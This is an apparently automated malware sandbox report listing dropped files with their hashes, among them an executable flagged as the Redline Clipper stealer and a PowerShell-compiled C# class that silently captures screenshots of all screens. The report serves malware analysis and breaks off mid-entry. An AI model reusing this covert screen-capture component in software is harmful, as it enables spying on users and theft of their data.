                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ryuu3g3.asp.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uzwljs2.kal.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a3ejxeyf.hdj.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a53tnpzv.rdj.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_epkgjt0u.0rf.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2mof1dx.lax.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fza2jgeq.5oo.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gkdldkmv.v04.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu0yzwqb.qhi.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdo2thbc.uaq.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogkk0u3w.d1d.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p35bqvam.v3j.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quuqklrz.xdn.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxwothsz.k2i.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rk2xvtmo.3it.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uakzazjh.kgj.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ufv0qwrl.2bk.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5xi1amh.mxr.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vhugdfo2.bfj.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj4n50bu.sgi.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xikwqogl.sm2.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe

                                                            Download File
                                                            Process:C:\Users\user\AppData\Local\Temp\bound.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):77824
                                                            Entropy (8bit):5.953922991411174
                                                            Encrypted:false
                                                            SSDEEP:768:h8vUuROfMZBwEO+xex+GkXBZJII++cAPsIo80dIKqCSqMj2qSERS1d8IabLLLL9:WvDrfNOaex+GI+IomlCQjMmIaJ
                                                            MD5:D4111CF483F20E0911E201EB512D0B75
                                                            SHA1:FE8E0C70CC6432B110FD4FA6A2B7C3470D6DB242
                                                            SHA-256:B8212199A0AB9800DF8CC57B2C67A9B3B9D4C8FB894EC1FF9DD98AF26286B9EB
                                                            SHA-512:7089B36ED281BEFA80EBA1DC7926EC5A044F56A916C8267F44450A89D62F60CCE0B47A39A99FA3198B4F59ABABE32F6E32CB1A5675051150A41E0C444FDB6977
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exe, Author: Joe Security
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....X`.............................=... ...@....@.. ..............................K.....@..................................=..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`......................@..B.................=......H........%...............................................................(....*Z.~....o....o....,..*.*.(....~....-........s.........~....(....*2......(....*6~......o....*..o..........~....o ...(...........(!...*..(0...*.s....(1...*Z~....o ...~....(....&*V.....()...(2........*..{#...*"..}#...*..{$...*"..}$...*..(3...*...0..........s.........~....s$...%r...po!...%rG..po#...o....~....s$...%r...po!...%r...po#...o....~....s$...%r...po!...%r]..po#...o....~....s$...%r...po!...%r...p

                                                            C:\Users\user\AppData\Local\Temp\yidhhzbx\CSCA27ED749AA364CCD94BFD566BA81531.TMP

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):652
                                                            Entropy (8bit):3.1063263237612535
                                                            Encrypted:false
                                                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySak7YnqqAPN5Dlq5J:+RI+ycuZhNEakSAPNnqX
                                                            MD5:733687553EB2523E71F6DAFA3059154A
                                                            SHA1:C07C488DFEAAF13C768DFE880FB83E4A996EDEAD
                                                            SHA-256:B61BF37C008F591DF18BA58A636D185FFDEABE4E3883E7D9CC2A921E1C4EFA82
                                                            SHA-512:AFF4D3D19950B776441D03F86547BE27423B29C2614072F57DC5BD93D801DDED1A8FC0333F99D5ECE8D1AB4B6FF85DE30D21DD8A2C6F654FC084917D91E590EB
                                                            Malicious:false
                                                            Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.i.d.h.h.z.b.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.i.d.h.h.z.b.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                            C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.0.cs

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1004
                                                            Entropy (8bit):4.154581034278981
                                                            Encrypted:false
                                                            SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
                                                            MD5:C76055A0388B713A1EABE16130684DC3
                                                            SHA1:EE11E84CF41D8A43340F7102E17660072906C402
                                                            SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
                                                            SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
                                                            Malicious:false
                                                            Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

                                                            C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):607
                                                            Entropy (8bit):5.374179697342967
                                                            Encrypted:false
                                                            SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ikOfxONWZEifxOo:V3ka6KOkqeFkOfIiEifIo
                                                            MD5:466389E90283E324019B2F3FB1ED0942
                                                            SHA1:5B27815481C7265B1E46E7E7C93FC129A091F095
                                                            SHA-256:3ECA2DF8C77BC282658A0397F29F29F809454300443366AF4B803E4F3B37115F
                                                            SHA-512:F4226D3CF11EAB2898A488DDBE0913FEC1EA3888292A0206094432A7B8BAE49B46F4BA60DF4445F9EBA8173FE18E2B4A1D904E74B6E3374BB91F5312F54C6FA2
                                                            Malicious:true
                                                            Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.0.cs"

                                                            C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.dll

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4096
                                                            Entropy (8bit):3.1583424082086964
                                                            Encrypted:false
                                                            SSDEEP:48:6o7oEAtf0KhzBU/Uf6mtJLN0jpW1ulEa3Yq:YNz0bmzOLCK
                                                            MD5:B68AFCBAAD3AE4D4D3EC83416F627AA3
                                                            SHA1:551E558E2CA8BECCD51D3003A1E39246FA586251
                                                            SHA-256:91596CD5A18380AA5DBBD1F01311D0A1B18746CE573CBF464F23E8A46089CF74
                                                            SHA-512:1AF101450C87C2336EC37C17BBC4538E329ACA132BD817E5D4D34050F8FFC9E82E9D846BEDD2731F42EFE9489ECA2ADC037F6F37AE57FAA2DA0438AB1D48FD02
                                                            Malicious:true
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

                                                            C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.out

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):1149
                                                            Entropy (8bit):5.519223893125502
                                                            Encrypted:false
                                                            SSDEEP:24:KJf+UId3ka6KOkqeFkOfIiEifIdKax5DqBVKVrdFAMBJTH:upkka6NkqeFkyIiEuIdK2DcVKdBJj
                                                            MD5:4177DA87ADA8842E162407F0EAC9F1EE
                                                            SHA1:6BE00BB277B2BB874C5670D0542683409A4BE271
